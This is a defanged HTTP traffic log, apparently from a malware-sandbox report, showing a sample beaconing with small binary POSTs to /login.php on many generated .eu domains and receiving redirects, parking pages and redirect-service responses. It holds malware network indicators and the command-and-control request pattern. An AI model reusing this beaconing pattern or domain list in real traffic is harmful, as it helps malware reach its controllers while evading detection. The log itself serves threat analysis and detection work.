Set-Cookie: btst=f8b55f9acdb8cb9696d32f18dbcea0d8|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.ryleryqacic.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.ryleryqacic.eu..Vary: Accept-Encoding..
GET /367a5a5db4f631d0cc1ad3c79b85b63a HTTP/1.1
Host: xsso.nojejecebuw.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=b36799928aa683da3e97e7666bae6fc8|194.242.96.218|1448010560|1448010560|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=367a5a5db4f631d0cc1ad3c79b85b63a; domain=.nojejecebuw.eu
19..Landed nojejecebuw.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/vofozymufok.eu
Set-Cookie: btst=c8d42d911f82f5e93b0d5af0b5bed915|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.vocakemenir.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>vocakemenir.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'vocakemenir.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0OS40NzY2OmM4MTZkOGU2M2E1MDlhZjBiNzgzYjEzODk2NDA4ZDk0OWE3MGUzYWFmOTM2NDEzZmZiZDlkNjI3ZjZhYzk4Y2Y6NTY0ZWUzMzU3NDYxNg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzNTcyYmE1fHx8MTQ0ODAxMDU0OS40ODI3fGE3MjY1Y2MxYjYwYzJkYzRjNjEzNzA3ZmExMzZmOTk5ODg0MTA1MGN8fHx8fDF8fHwwfDU2NGVlMzM1MTM1MzVmM2E0MThiNTAwYXx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.qetuluvolos.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:14 GMT
Server: Apache
Set-Cookie: vsid=914vr1955561546911765; expires=Wed, 18-Nov-2020 09:09:14 GMT; path=/; domain=ww92.qetuluvolos.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FdfVp3qmd7GRqViRDr1/BuqYVKM/PT/wsExrtIQCWY5wMO8yc/A6wGeskiiH45fFPSkQqlGjcss4YTmqvh20rA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FdfVp3qmd7GRqViRDr1/BuqYVKM/PT/wsExrtIQCWY5wMO8yc/A6wGeskiiH45fFPSkQqlGjcss4YTmqvh20rA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.qetuluvolos.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qetuluvolos.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qetuluvolos.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.qetuluvolos.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
GET /1acef55da687a834a563e6c7f72341c6 HTTP/1.1
Host: xsso.kemocujufys.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=cc6592e9d00c7d5db9df2b8578caaed5|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=1acef55da687a834a563e6c7f72341c6; domain=.kemocujufys.eu
19..Landed kemocujufys.eu<br>..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.pupujeguper.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>pupujeguper.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'pupujeguper.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0NS4wNTQ3OjQyZjQwZTBkYTEyMWMwNTJmNzFiYmZjNzQ4YWU4M2Q3NzUwMWRlMmU1Y2U1ZmVjNjMyMDc4MjAyN2Q2OTUzNGU6NTY0ZWUzMzEwZDY1ZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMzMDdlNzc5fHx8MTQ0ODAxMDU0NS4wNjMxfGM4Y2RlZmIxNWYyMWNhM2EwNTI1M2YwNzUyM2QwMzg1ZDViMmU1NjR8fHx8fDF8fHwwfDU2NGVlMzMxODhmYmNlNjA5MjhiNGEzMnx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:40 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.ryhuzilywax.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:40 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.ryhuzilywax.eu..Vary: Accept-Encoding......
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:42 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.ryhuzilywax.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:42 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.ryhuzilywax.eu..Vary: Accept-Encoding..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.kevedorozup.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.kevedorozup.eu..Vary: Accept-Encoding..
GET /domain/nopegymozow.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=90623dde15463e9fb45001ad5063db65; domain=.nopegymozow.eu
Location: hXXp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65
3e..Go hXXp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.digusebyvad.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:19:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>digusebyvad.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'digusebyvad.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU4NC43Nzg2OjQzYzZiNDhjNDEyMjdkMTVkYzM3MTkyYzYwYmRiZGFjYWZiZDQzMTA5MDk2NmEzOWM3Y2IyNmM0ZTJmOWM3YjA6NTY0ZWUzNThiZTE4Yg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM1OGJjZTBhfHx8MTQ0ODAxMDU4NC43ODIyfDAxOWQ2MDBhYmU5MmRhM2Y2ODc2YjA3ZWEyZDkzMzYyYWJhNTYwZmV8fHx8fDF8fHwwfDU2NGVlMzU4MWQzNTNkZTAwOThiNWYxNXx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
GET /56531f80c1f00a0d974859702a1ece40 HTTP/1.1
Host: xsso.fodakyhijyv.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=f8b55f9acdb8cb9696d32f18dbcea0d8|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=56531f80c1f00a0d974859702a1ece40; domain=.fodakyhijyv.eu
19..Landed fodakyhijyv.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:33 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.puregivytoh.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:33 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.puregivytoh.eu..Vary: Accept-Encoding..
GET /domain/ciliqikytec.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f89965e1c0417ff83998ff3762e77e38; domain=.ciliqikytec.eu
Location: hXXp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38
3e..Go hXXp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.qexofyqihid.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:07 GMT
Server: Apache
Set-Cookie: vsid=923vr1955561476019761; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.qexofyqihid.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lxGQnIqPOObSvpRYhIBExqLbnpqaCDaWB5CI8dJz0yNx3DyRMOZdcOV5tGiCkFN10nldNwse8nilDEMF/BQpMg==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=46
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lxGQnIqPOObSvpRYhIBExqLbnpqaCDaWB5CI8dJz0yNx3DyRMOZdcOV5tGiCkFN10nldNwse8nilDEMF/BQpMg==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.qexofyqihid.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qexofyqihid.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qexofyqihid.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.qexofyqihid.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/lyvejujolec.eu
Set-Cookie: btst=921732dff967db654c4cf7d27e59db6c|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.pupujeguper.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.pupujeguper.eu..Vary: Accept-Encoding..
GET /519227042aaa4d45b3d8d04c6d6182c2 HTTP/1.1
Host: xsso.vofozymufok.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=c8d42d911f82f5e93b0d5af0b5bed915|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=519227042aaa4d45b3d8d04c6d6182c2; domain=.vofozymufok.eu
19..Landed vofozymufok.eu<br>..0..
GET /bd3d82839c544969cd7e5b6b151fa69e HTTP/1.1
Host: xsso.qeqinuqypoq.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=aad574aa2a3f3a3a77f150faa40af1c1|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=bd3d82839c544969cd7e5b6b151fa69e; domain=.qeqinuqypoq.eu
19..Landed qeqinuqypoq.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xugiqonenuz.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=909bfe917d8125c576546cf2675a42ec; Expires=Fri, 18 Nov 2022 09:09:18 GMT
Date: Fri, 20 Nov 2015 09:09:18 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
GET /domain/lyvejujolec.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=be7c0ab0ac1acf15c755867799d818c8; domain=.lyvejujolec.eu
Location: hXXp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8
3e..Go hXXp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:48 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.qekikyvutic.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:48 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.qekikyvutic.eu..Vary: Accept-Encoding..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: keraborigin.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2015 09:09:43 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address>.</body></html>.....
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
